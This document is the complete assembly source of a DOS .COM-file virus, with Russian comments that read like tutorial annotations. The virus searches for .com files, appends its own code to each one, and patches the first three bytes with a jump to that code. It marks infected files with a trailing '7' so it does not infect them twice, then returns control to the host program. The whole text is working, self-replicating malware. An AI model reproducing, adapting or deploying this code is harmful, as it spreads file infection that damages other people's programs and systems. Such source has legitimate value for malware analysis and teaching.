prg segment
assume cs:prg,ds:prg,es:prg,ss:prg
org 100h
start: jmp vir ;Передача управления вирусному коду
org 110h
vir: push ds ;Сохраним DS ...Корректируем
mov ax,ds ;регистр DS ...
db 05h ;Код команды
add_to_ds: dw 0 ; " ADD AX,00h "
mov ds,ax ;AX -> DS ...
fresh_bytes:
mov al,old_bytes
mov cs:[100h],al
mov al,old_bytes+1
mov cs:[101h],al
mov al,old_bytes+2
mov cs:[102h],al
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
save_dta:
mov al,byte ptr cs:[bx];Читаем из DTA байт и перено-
mov ds:[si],al ;сим его в мас сив ...
inc bx ;К новому байту
inc si ;
loop save_dta ;Цикл 128 раз
find_first:
mov ah,4eh ;Поиск первого файла ...
mov cx,00100110b ;archive, system hidden
lea dx,maska ;Маска для поиска
int 21h
jnc r_3 ;Нашли !
jmp restore_dta ;Ошибка !
find_next: mov ah,3eh ;Закроем непод-
int 21h ;ходящий файл...
jnc r_2
jmp restore_dta ;Файл нельзя закрыть !
r_2: mov ah,4fh ;И найдем сле-
int 21h ;дующий ...
jnc r_3 ;Файл найден !
jmp restore_dta ;Ошибка !
r_3: mov cx,12 ;Сотрем в буфере
lea si,fn ;"fn" имя пред-
destroy_name: ;ыдущего файла
mov byte ptr [si],0 ;
inc si ;
loop destroy_name ;Цикл 12 раз ...
xor si,si ;И запишем в буфер имя только
copy_name: mov al,byte ptr cs:[si+9eh]
cmp al,0 ;что найденного файла ...
je open ;В конце имени в
mov byte ptr ds:fn[si],al ;DTA всегда сто-
inc si ;ит ноль, его мы
jmp copy_name ;и хотим достичь
open: mov ax,3d02h ;Открыть файл для чтения и записи
lea dx,fn ;Имя файла ...
int 21h ;Функция DOS
jnc save_bytes
jmp restore_dta ;Файл не открывается !
save_bytes: ;Считаем три байта :
mov bx,ax ;Сохраним дескриптор в BX
mov ah,3fh ;Номер функции
mov cx,3 ;Сколько байт ?
lea dx,old_bytes ;Буфер для считываемых данных
int 21h
jnc found_size
jmp close ;Ошибка !
found_size:
mov ax,cs:[09ah] ;Найдем размер файла
count_size:mov si,ax
cmp ax,64000 ;Файл длиннее 64000 байт ?
jna toto ;Нет ...
jmp find_next ;Да - тогда он нам не подходит
toto: test ax,000fh ;Округлим размер
jz krat_16 ;до целого числа
or ax,000fh ;параграфов в
inc ax ;большую сторону
krat_16: mov di,ax ;И запишем ок ругленное значение в DI ...
; Расчитаем смещение для перехода на код вируса ...
sub ax,3 ;Сама командаперехода зани мает три байта!
mov byte ptr new_bytes[1],al;Смещение найдено !
mov byte ptr new_bytes[2],ah
mov ax,di ;Сколько пара-
mov cl,4 ;графов содержит
shr ax,cl ;заражаемая про грамма ?
dec ax ;Учитываем действие директивы ORG 110h ...
mov byte ptr add_to_ds,al ; Корректирующее число найдено !
mov byte ptr add_to_ds+1,ah
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на пос-
dec si ;ледний байт
mov dx,si ;файла ...
int 21h
jnc read_last
jmp close ;Ошибка !
read_last: ;И считаем этот
mov ah,3fh ;байт в ячейку
mov cx,1 ; " last " ...
lea dx,last
int 21h
jc close ;Ошибка !
cmp last,'7' ;" last " =" 7 "
jne write_vir ;Нет - дальше
jmp find_next ;Да- поищем дру гой файл ...
write_vir: mov ax,4200h ;Установим ука-
xor cx,cx ;затель на конец
mov dx,di ;файла ...
int 21h
jc close ;При ошибке -закроем файл
mov ah,40h ;Запишем в файл
mov cx,vir_len ;код вируса дли-
lea dx,vir ;ной vir_len
int 21h
jc close ;При ошибке - закроем файл
write_bytes:
mov ax,4200h ;Установим ука-
xor cx,cx ;затель на нача-
xor dx,dx ;ло файла
int 21h
jc close ;При ошибке - закроем файл
mov ah,40h ;Запишем в файл
mov cx,3 ;первые три бай-
lea dx,new_bytes ;та ( команду
int 21h ;перехода ) ...
close: mov ah,3eh ;Закроем зара-
int 21h ;женный файл ...
restore_dta:
mov cx,80h ;Размер DTA -128 байт ...
mov bx,80h ;Смещение к DTA
lea si,old_dta ;Адрес массива
dta_fresh:
mov al,ds:[si] ;Читаем из массива "old_dta"
mov byte ptr cs:[bx],al;байт и перенo сим его в DTA
inc bx ;К новому байту
inc si ;
loop dta_fresh ;Цикл 128 раз
pop ds ;Восстановим испорченный DS
push cs ;Занесем в стеk регистр CS
db 0b8h ;Код команды
jump: dw 100h ;mov ax,100h
push ax ;Занесем в стек число 100h
retf ;Передача управления на заданный адрес ...
;*Data area ...
old_bytes db 0e9h ;Исходные три байта заражен-
dw vir_len + 0dh ;ной программы
old_dta db 128 dup (0) ;Здесь вирус хранит исходную DTA программы
maska db '*.com',0 ;Маска для поиска файлов ...
fn db 12 dup (' '),0 ;Сюда помещается имя файла -жертвы ...
new_bytes db 0e9h ;Первые три бай-
db 00h ;та вируса в
db 00h ;файле ...
last db 0 ;Ячейка для последнего байта
db '7' ;Последний байт вируса в файле
vir_len equ $-vir ;Длина вирусного кода ...
prg_end: mov ah,4ch ;Завершение за-
INT 21H ;пускающей прог раммы ...
db '7' ;Без этого символа вирус за разил бы сам себя ...
prg ends ;Все ASM - прог-
end start ;раммы заканчиваются примерно так .
|
|
